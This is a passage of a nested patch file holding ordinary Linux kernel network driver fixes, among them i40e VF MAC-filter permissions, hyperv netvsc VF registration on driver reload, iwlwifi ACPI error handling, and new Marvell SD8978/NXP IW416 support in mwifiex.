+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -2846,6 +2846,24 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 				      (u8 *)&stats, sizeof(stats));
+ }
+ 
++/**
++ * i40e_can_vf_change_mac
++ * @vf: pointer to the VF info
++ *
++ * Return true if the VF is allowed to change its MAC filters, false otherwise
++ */
++static bool i40e_can_vf_change_mac(struct i40e_vf *vf)
++{
++	/* If the VF MAC address has been set administratively (via the
++	 * ndo_set_vf_mac command), then deny permission to the VF to
++	 * add/delete unicast MAC addresses, unless the VF is trusted
++	 */
++	if (vf->pf_set_mac && !vf->trusted)
++		return false;
++
++	return true;
++}
++
+ #define I40E_MAX_MACVLAN_PER_HW 3072
+ #define I40E_MAX_MACVLAN_PER_PF(num_ports) (I40E_MAX_MACVLAN_PER_HW /	\
+ 	(num_ports))
+@@ -2905,8 +2923,8 @@ static inline int i40e_check_vf_permission(struct i40e_vf *vf,
+ 		 * The VF may request to set the MAC address filter already
+ 		 * assigned to it so do not return an error in that case.
+ 		 */
+-		if (!test_bit(I40E_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps) &&
+-		    !is_multicast_ether_addr(addr) && vf->pf_set_mac &&
++		if (!i40e_can_vf_change_mac(vf) &&
++		    !is_multicast_ether_addr(addr) &&
+ 		    !ether_addr_equal(addr, vf->default_lan_addr.addr)) {
+ 			dev_err(&pf->pdev->dev,
+ 				"VF attempting to override administratively set MAC address, bring down and up the VF interface to resume normal operation\n");
+@@ -3049,19 +3067,29 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+ 			goto error_param;
+ 		}
+-		if (ether_addr_equal(al->list[i].addr, vf->default_lan_addr.addr))
+-			was_unimac_deleted = true;
+ 	}
+ 	vsi = pf->vsi[vf->lan_vsi_idx];
+ 
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
+ 	/* delete addresses from the list */
+-	for (i = 0; i < al->num_elements; i++)
++	for (i = 0; i < al->num_elements; i++) {
++		const u8 *addr = al->list[i].addr;
++
++		/* Allow to delete VF primary MAC only if it was not set
++		 * administratively by PF or if VF is trusted.
++		 */
++		if (ether_addr_equal(addr, vf->default_lan_addr.addr) &&
++		    i40e_can_vf_change_mac(vf))
++			was_unimac_deleted = true;
++		else
++			continue;
++
+ 		if (i40e_del_mac_filter(vsi, al->list[i].addr)) {
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+ 			spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 			goto error_param;
+ 		}
++	}
+ 
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index 3b9ba8fa247ab..dc2e204bcd727 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -65,6 +65,8 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 	tcam->max_groups = max_groups;
+ 	tcam->max_group_size = MLXSW_CORE_RES_GET(mlxsw_sp->core,
+ 						 ACL_MAX_GROUP_SIZE);
++	tcam->max_group_size = min_t(unsigned int, tcam->max_group_size,
++				     MLXSW_REG_PAGT_ACL_MAX_NUM);
+ 
+ 	err = ops->init(mlxsw_sp, tcam->priv, tcam);
+ 	if (err)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c b/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
+index 41fa2523d91d3..5f2cd9a8cf8fb 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
+@@ -37,19 +37,24 @@ static void lan966x_lag_set_aggr_pgids(struct lan966x *lan966x)
+ 
+ 	/* Now, set PGIDs for each active LAG */
+ 	for (lag = 0; lag < lan966x->num_phys_ports; ++lag) {
+-		struct net_device *bond = lan966x->ports[lag]->bond;
++		struct lan966x_port *port = lan966x->ports[lag];
+ 		int num_active_ports = 0;
++		struct net_device *bond;
+ 		unsigned long bond_mask;
+ 		u8 aggr_idx[16];
+ 
+-		if (!bond || (visited & BIT(lag)))
++		if (!port || !port->bond || (visited & BIT(lag)))
+ 			continue;
+ 
++		bond = port->bond;
+ 		bond_mask = lan966x_lag_get_mask(lan966x, bond);
+ 
+ 		for_each_set_bit(p, &bond_mask, lan966x->num_phys_ports) {
+ 			struct lan966x_port *port = lan966x->ports[p];
+ 
++			if (!port)
++				continue;
++
+ 			lan_wr(ANA_PGID_PGID_SET(bond_mask),
+ 			       lan966x, ANA_PGID(p));
+ 			if (port->lag_tx_active)
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index f7492be452aed..7af03b45555dd 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1379,10 +1379,30 @@ static void nfp_nft_ct_translate_mangle_action(struct flow_action_entry *mangle_
+ 		mangle_action->mangle.mask = (__force u32)cpu_to_be32(mangle_action->mangle.mask);
+ 		return;
+ 
++	/* Both struct tcphdr and struct udphdr start with
++	 *	__be16 source;
++	 *	__be16 dest;
++	 * so we can use the same code for both.
++	 */
+ 	case FLOW_ACT_MANGLE_HDR_TYPE_TCP:
+ 	case FLOW_ACT_MANGLE_HDR_TYPE_UDP:
+-		mangle_action->mangle.val = (__force u16)cpu_to_be16(mangle_action->mangle.val);
+-		mangle_action->mangle.mask = (__force u16)cpu_to_be16(mangle_action->mangle.mask);
++		if (mangle_action->mangle.offset == offsetof(struct tcphdr, source)) {
++			mangle_action->mangle.val =
++				(__force u32)cpu_to_be32(mangle_action->mangle.val << 16);
++			/* The mask of mangle action is inverse mask,
++			 * so clear the dest tp port with 0xFFFF
++			 * instead of using a rotate-left operation.
++			 */
++			mangle_action->mangle.mask =
++				(__force u32)cpu_to_be32(mangle_action->mangle.mask << 16 | 0xFFFF);
++		}
++		if (mangle_action->mangle.offset == offsetof(struct tcphdr, dest)) {
++			mangle_action->mangle.offset = 0;
++			mangle_action->mangle.val =
++				(__force u32)cpu_to_be32(mangle_action->mangle.val);
++			mangle_action->mangle.mask =
++				(__force u32)cpu_to_be32(mangle_action->mangle.mask);
++		}
+ 		return;
+ 
+ 	default:
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c b/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
+index 52f67157bd0f7..a3c52c91a575d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
+@@ -980,7 +980,7 @@ nfp_tunnel_add_shared_mac(struct nfp_app *app, struct net_device *netdev,
+ 	u16 nfp_mac_idx = 0;
+ 
+ 	entry = nfp_tunnel_lookup_offloaded_macs(app, netdev->dev_addr);
+-	if (entry && nfp_tunnel_is_mac_idx_global(entry->index)) {
++	if (entry && (nfp_tunnel_is_mac_idx_global(entry->index) || netif_is_lag_port(netdev))) {
+ 		if (entry->bridge_count ||
+ 		    !nfp_flower_is_supported_bridge(netdev)) {
+ 			nfp_tunnel_offloaded_macs_inc_ref_and_link(entry,
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
+index 33b4c28563162..3f10c5365c80e 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
+@@ -537,11 +537,13 @@ static int enable_bars(struct nfp6000_pcie *nfp, u16 interface)
+ 	const u32 barcfg_msix_general =
+ 		NFP_PCIE_BAR_PCIE2CPP_MapType(
+ 			NFP_PCIE_BAR_PCIE2CPP_MapType_GENERAL) |
+-		NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT;
++		NFP_PCIE_BAR_PCIE2CPP_LengthSelect(
++			NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT);
+ 	const u32 barcfg_msix_xpb =
+ 		NFP_PCIE_BAR_PCIE2CPP_MapType(
+ 			NFP_PCIE_BAR_PCIE2CPP_MapType_BULK) |
+-		NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT |
++		NFP_PCIE_BAR_PCIE2CPP_LengthSelect(
++			NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT) |
+ 		NFP_PCIE_BAR_PCIE2CPP_Target_BaseAddress(
+ 			NFP_CPP_TARGET_ISLAND_XPB);
+ 	const u32 barcfg_explicit[4] = {
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index e988a60c8561b..66178ce6d000e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3826,6 +3826,9 @@ static int __stmmac_open(struct net_device *dev,
+ 	priv->rx_copybreak = STMMAC_RX_COPYBREAK;
+ 
+ 	buf_sz = dma_conf->dma_buf_sz;
++	for (int i = 0; i < MTL_MAX_TX_QUEUES; i++)
++		if (priv->dma_conf.tx_queue[i].tbs & STMMAC_TBS_EN)
++			dma_conf->tx_queue[i].tbs = priv->dma_conf.tx_queue[i].tbs;
+ 	memcpy(&priv->dma_conf, dma_conf, sizeof(*dma_conf));
+ 
+ 	stmmac_reset_queues_param(priv);
+diff --git a/drivers/net/ethernet/ti/cpsw.c b/drivers/net/ethernet/ti/cpsw.c
+index 13c9c2d6b79bb..d95771ca4e5a3 100644
+--- a/drivers/net/ethernet/ti/cpsw.c
++++ b/drivers/net/ethernet/ti/cpsw.c
+@@ -631,6 +631,8 @@ static void cpsw_slave_open(struct cpsw_slave *slave, struct cpsw_priv *priv)
+ 		}
+ 	}
+ 
++	phy->mac_managed_pm = true;
++
+ 	slave->phy = phy;
+ 
+ 	phy_attached_info(slave->phy);
+diff --git a/drivers/net/ethernet/ti/cpsw_new.c b/drivers/net/ethernet/ti/cpsw_new.c
+index 83596ec0c7cb9..6e70aa1cc7bf1 100644
+--- a/drivers/net/ethernet/ti/cpsw_new.c
++++ b/drivers/net/ethernet/ti/cpsw_new.c
+@@ -772,6 +772,9 @@ static void cpsw_slave_open(struct cpsw_slave *slave, struct cpsw_priv *priv)
+ 			slave->slave_num);
+ 		return;
+ 	}
++
++	phy->mac_managed_pm = true;
++
+ 	slave->phy = phy;
+ 
+ 	phy_attached_info(slave->phy);
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index da737d959e81c..3a834d4e1c842 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -740,7 +740,10 @@ void netvsc_device_remove(struct hv_device *device)
+ 	/* Disable NAPI and disassociate its context from the device. */
+ 	for (i = 0; i < net_device->num_chn; i++) {
+ 		/* See also vmbus_reset_channel_cb(). */
+-		napi_disable(&net_device->chan_table[i].napi);
++		/* only disable enabled NAPI channel */
++		if (i < ndev->real_num_rx_queues)
++			napi_disable(&net_device->chan_table[i].napi);
++
+ 		netif_napi_del(&net_device->chan_table[i].napi);
+ 	}
+ 
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index c1aac6ceb29e6..1b74055399840 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -42,6 +42,10 @@
+ #define LINKCHANGE_INT (2 * HZ)
+ #define VF_TAKEOVER_INT (HZ / 10)
+ 
++/* Macros to define the context of vf registration */
++#define VF_REG_IN_PROBE		1
++#define VF_REG_IN_NOTIFIER	2
++
+ static unsigned int ring_size __ro_after_init = 128;
+ module_param(ring_size, uint, 0444);
+ MODULE_PARM_DESC(ring_size, "Ring buffer size (# of 4K pages)");
+@@ -2181,7 +2185,7 @@ static rx_handler_result_t netvsc_vf_handle_frame(struct sk_buff **pskb)
+ }
+ 
+ static int netvsc_vf_join(struct net_device *vf_netdev,
+-			  struct net_device *ndev)
++			  struct net_device *ndev, int context)
+ {
+ 	struct net_device_context *ndev_ctx = netdev_priv(ndev);
+ 	int ret;
+@@ -2204,7 +2208,11 @@ static int netvsc_vf_join(struct net_device *vf_netdev,
+ 		goto upper_link_failed;
+ 	}
+ 
+-	schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
++	/* If this registration is called from probe context, vf_takeover
++	 * is taken care of later in probe itself.
++	 */
++	if (context == VF_REG_IN_NOTIFIER)
++		schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
+ 
+ 	call_netdevice_notifiers(NETDEV_JOIN, vf_netdev);
+ 
+@@ -2342,7 +2350,7 @@ static int netvsc_prepare_bonding(struct net_device *vf_netdev)
+ 	return NOTIFY_DONE;
+ }
+ 
+-static int netvsc_register_vf(struct net_device *vf_netdev)
++static int netvsc_register_vf(struct net_device *vf_netdev, int context)
+ {
+ 	struct net_device_context *net_device_ctx;
+ 	struct netvsc_device *netvsc_dev;
+@@ -2382,7 +2390,7 @@ static int netvsc_register_vf(struct net_device *vf_netdev)
+ 
+ 	netdev_info(ndev, "VF registering: %s\n", vf_netdev->name);
+ 
+-	if (netvsc_vf_join(vf_netdev, ndev) != 0)
++	if (netvsc_vf_join(vf_netdev, ndev, context) != 0)
+ 		return NOTIFY_DONE;
+ 
+ 	dev_hold(vf_netdev);
+@@ -2480,10 +2488,31 @@ static int netvsc_unregister_vf(struct net_device *vf_netdev)
+ 	return NOTIFY_OK;
+ }
+ 
++static int check_dev_is_matching_vf(struct net_device *event_ndev)
++{
++	/* Skip NetVSC interfaces */
++	if (event_ndev->netdev_ops == &device_ops)
++		return -ENODEV;
++
++	/* Avoid non-Ethernet type devices */
++	if (event_ndev->type != ARPHRD_ETHER)
++		return -ENODEV;
++
++	/* Avoid Vlan dev with same MAC registering as VF */
++	if (is_vlan_dev(event_ndev))
++		return -ENODEV;
++
++	/* Avoid Bonding master dev with same MAC registering as VF */
++	if (netif_is_bond_master(event_ndev))
++		return -ENODEV;
++
++	return 0;
++}
++
+ static int netvsc_probe(struct hv_device *dev,
+ 			const struct hv_vmbus_device_id *dev_id)
+ {
+-	struct net_device *net = NULL;
++	struct net_device *net = NULL, *vf_netdev;
+ 	struct net_device_context *net_device_ctx;
+ 	struct netvsc_device_info *device_info = NULL;
+ 	struct netvsc_device *nvdev;
+@@ -2592,6 +2621,30 @@ static int netvsc_probe(struct hv_device *dev,
+ 	}
+ 
+ 	list_add(&net_device_ctx->list, &netvsc_dev_list);
++
++	/* When the hv_netvsc driver is unloaded and reloaded, the
++	 * NET_DEVICE_REGISTER for the vf device is replayed before probe
++	 * is complete. This is because register_netdevice_notifier() gets
++	 * registered before vmbus_driver_register(), so that the callback
++	 * func is set before probe and we don't miss events like
++	 * NETDEV_POST_INIT. So, in this section we try to register the
++	 * matching vf device that is present as a netdevice, knowing that
++	 * its register call is not processed in netvsc_netdev_notifier
++	 * (as probing is in progress and get_netvsc_byslot fails).
++	 */
++	for_each_netdev(dev_net(net), vf_netdev) {
++		ret = check_dev_is_matching_vf(vf_netdev);
++		if (ret != 0)
++			continue;
++
++		if (net != get_netvsc_byslot(vf_netdev))
++			continue;
++
++		netvsc_prepare_bonding(vf_netdev);
++		netvsc_register_vf(vf_netdev, VF_REG_IN_PROBE);
++		__netvsc_vf_setup(net, vf_netdev);
++		break;
++	}
+ 	rtnl_unlock();
+ 
+ 	netvsc_devinfo_put(device_info);
+@@ -2748,28 +2801,17 @@ static int netvsc_netdev_event(struct notifier_block *this,
+ 			       unsigned long event, void *ptr)
+ {
+ 	struct net_device *event_dev = netdev_notifier_info_to_dev(ptr);
++	int ret = 0;
+ 
+-	/* Skip our own events */
+-	if (event_dev->netdev_ops == &device_ops)
+-		return NOTIFY_DONE;
+-
+-	/* Avoid non-Ethernet type devices */
+-	if (event_dev->type != ARPHRD_ETHER)
+-		return NOTIFY_DONE;
+-
+-	/* Avoid Vlan dev with same MAC registering as VF */
+-	if (is_vlan_dev(event_dev))
+-		return NOTIFY_DONE;
+-
+-	/* Avoid Bonding master dev with same MAC registering as VF */
+-	if (netif_is_bond_master(event_dev))
++	ret = check_dev_is_matching_vf(event_dev);
++	if (ret != 0)
+ 		return NOTIFY_DONE;
+ 
+ 	switch (event) {
+ 	case NETDEV_POST_INIT:
+ 		return netvsc_prepare_bonding(event_dev);
+ 	case NETDEV_REGISTER:
+-		return netvsc_register_vf(event_dev);
++		return netvsc_register_vf(event_dev, VF_REG_IN_NOTIFIER);
+ 	case NETDEV_UNREGISTER:
+ 		return netvsc_unregister_vf(event_dev);
+ 	case NETDEV_UP:
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index 585e8cd2d332d..f5fcc547de391 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -576,7 +576,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 2) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -592,7 +592,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 1) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -608,7 +608,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 0) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -665,7 +665,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 2) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -681,7 +681,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 1) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -697,7 +697,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 0) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -1044,6 +1044,9 @@ int iwl_acpi_get_ppag_table(struct iwl_fw_runtime *fwrt)
+ 		goto read_table;
+ 	}
+ 
++	ret = PTR_ERR(wifi_pkg);
++	goto out_free;
++
+ read_table:
+ 	fwrt->ppag_ver = tbl_rev;
+ 	flags = &wifi_pkg->package.elements[1];
+diff --git a/drivers/net/wireless/marvell/mwifiex/Kconfig b/drivers/net/wireless/marvell/mwifiex/Kconfig
+index 2b4ff2b78a7e1..b182f7155d66f 100644
+--- a/drivers/net/wireless/marvell/mwifiex/Kconfig
++++ b/drivers/net/wireless/marvell/mwifiex/Kconfig
+@@ -10,13 +10,14 @@ config MWIFIEX
+ 	  mwifiex.
+ 
+ config MWIFIEX_SDIO
+-	tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897/SD8977/SD8987/SD8997"
++	tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897/SD8977/SD8978/SD8987/SD8997"
+ 	depends on MWIFIEX && MMC
+ 	select FW_LOADER
+ 	select WANT_DEV_COREDUMP
+ 	help
+ 	  This adds support for wireless adapters based on Marvell
+-	  8786/8787/8797/8887/8897/8977/8987/8997 chipsets with SDIO interface.
++	  8786/8787/8797/8887/8897/8977/8978/8987/8997 chipsets with
++	  SDIO interface. SD8978 is also known as NXP IW416.
+ 
+ 	  If you choose to build it as a module, it will be called
+ 	  mwifiex_sdio.
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index ea1c1c2412e72..2c9b70e9a7263 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -263,7 +263,7 @@ static const struct mwifiex_sdio_card_reg mwifiex_reg_sd8887 = {
+ 				 0x68, 0x69, 0x6a},
+ };
+ 
+-static const struct mwifiex_sdio_card_reg mwifiex_reg_sd8987 = {
++static const struct mwifiex_sdio_card_reg mwifiex_reg_sd89xx = {
+ 	.start_rd_port = 0,
+ 	.start_wr_port = 0,
+ 	.base_0_reg = 0xF8,
+@@ -331,6 +331,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8786 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = false,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8787 = {
+@@ -346,6 +347,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8787 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8797 = {
+@@ -361,6 +363,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8797 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8897 = {
+@@ -376,6 +379,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8897 = {
+ 	.can_dump_fw = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8977 = {
+@@ -392,6 +396,24 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8977 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
++};
++
++static const struct mwifiex_sdio_device mwifiex_sdio_sd8978 = {
++	.firmware_sdiouart = SD8978_SDIOUART_FW_NAME,
++	.reg = &mwifiex_reg_sd89xx,
++	.max_ports = 32,
++	.mp_agg_pkt_limit = 16,
++	.tx_buf_size = MWIFIEX_TX_DATA_BUF_SIZE_4K,
++	.mp_tx_agg_buf_size = MWIFIEX_MP_AGGR_BUF_SIZE_MAX,
++	.mp_rx_agg_buf_size = MWIFIEX_MP_AGGR_BUF_SIZE_MAX,
++	.supports_sdio_new_mode = true,
++	.has_control_mask = false,
++	.can_dump_fw = true,
++	.fw_dump_enh = true,
++	.can_auto_tdls = false,
++	.can_ext_scan = true,
++	.fw_ready_extra_delay = true,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8997 = {
+@@ -409,6 +431,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8997 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8887 = {
+@@ -424,11 +447,12 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8887 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = true,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8987 = {
+ 	.firmware = SD8987_DEFAULT_FW_NAME,
+-	.reg = &mwifiex_reg_sd8987,
++	.reg = &mwifiex_reg_sd89xx,
+ 	.max_ports = 32,
+ 	.mp_agg_pkt_limit = 16,
+ 	.tx_buf_size = MWIFIEX_TX_DATA_BUF_SIZE_2K,
+@@ -440,6 +464,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8987 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = true,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8801 = {
+@@ -455,6 +480,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8801 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static struct memory_type_mapping generic_mem_type_map[] = {
+@@ -482,7 +508,9 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
++	{ .compatible = "marvell,sd8978" },
+ 	{ .compatible = "marvell,sd8997" },
++	{ .compatible = "nxp,iw416" },
+ 	{ }
+ };
+ 
+@@ -545,6 +573,7 @@ mwifiex_sdio_probe(struct sdio_func *func, const struct sdio_device_id *id)
+ 		card->fw_dump_enh = data->fw_dump_enh;
+ 		card->can_auto_tdls = data->can_auto_tdls;
+ 		card->can_ext_scan = data->can_ext_scan;
++		card->fw_ready_extra_delay = data->fw_ready_extra_delay;
+ 		INIT_WORK(&card->work, mwifiex_sdio_work);
+ 	}
+ 
+@@ -748,8 +777,9 @@ mwifiex_sdio_read_fw_status(struct mwifiex_adapter *adapter, u16 *dat)
+ static int mwifiex_check_fw_status(struct mwifiex_adapter *adapter,
+ 				   u32 poll_num)
+ {
++	struct sdio_mmc_card *card = adapter->card;
+ 	int ret = 0;
+-	u16 firmware_stat;
++	u16 firmware_stat = 0;
+ 	u32 tries;
+ 
+ 	for (tries = 0; tries < poll_num; tries++) {
+@@ -765,6 +795,13 @@ static int mwifiex_check_fw_status(struct mwifiex_adapter *adapter,
+ 		ret = -1;
+ 	}
+ 
++	if (card->fw_ready_extra_delay &&
++	    firmware_stat == FIRMWARE_READY_SDIO)
++		/* firmware might pretend to be ready when it's not.
++		 * Wait a little bit more as a workaround.
++		 */
++		msleep(100);
++
+ 	return ret;
+ }
+ 
+@@ -920,6 +957,8 @@ static const struct sdio_device_id mwifiex_ids[] = {
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8801},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8977_WLAN),
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8977},
++	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8978_WLAN),
++		.driver_data = (unsigned long)&mwifiex_sdio_sd8978},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8987_WLAN),
+ 		.driver_data = (unsigned long)&mwifiex_sdio_sd8987},
+ 	{SDIO_DEVICE(SDIO_VENDOR_ID_MARVELL, SDIO_DEVICE_ID_MARVELL_8997_WLAN),
+@@ -3164,6 +3203,7 @@ MODULE_FIRMWARE(SD8797_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8897_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8887_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8977_DEFAULT_FW_NAME);
++MODULE_FIRMWARE(SD8978_SDIOUART_FW_NAME);
+ MODULE_FIRMWARE(SD8987_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8997_DEFAULT_FW_NAME);
+ MODULE_FIRMWARE(SD8997_SDIOUART_FW_NAME);
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.h b/drivers/net/wireless/marvell/mwifiex/sdio.h
+index 3a24bb48b2996..a5112cb35cdcd 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.h
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.h
+@@ -25,6 +25,7 @@
+ #define SD8887_DEFAULT_FW_NAME "mrvl/sd8887_uapsta.bin"
+ #define SD8801_DEFAULT_FW_NAME "mrvl/sd8801_uapsta.bin"
+ #define SD8977_DEFAULT_FW_NAME "mrvl/sdsd8977_combo_v2.bin"
++#define SD8978_SDIOUART_FW_NAME "mrvl/sdiouartiw416_combo_v0.bin"
+ #define SD8987_DEFAULT_FW_NAME "mrvl/sd8987_uapsta.bin"
+ #define SD8997_DEFAULT_FW_NAME "mrvl/sdsd8997_combo_v4.bin"
+ #define SD8997_SDIOUART_FW_NAME "mrvl/sdiouart8997_combo_v4.bin"
+@@ -257,6 +258,7 @@ struct sdio_mmc_card {
+ 	bool fw_dump_enh;
+ 	bool can_auto_tdls;
+ 	bool can_ext_scan;
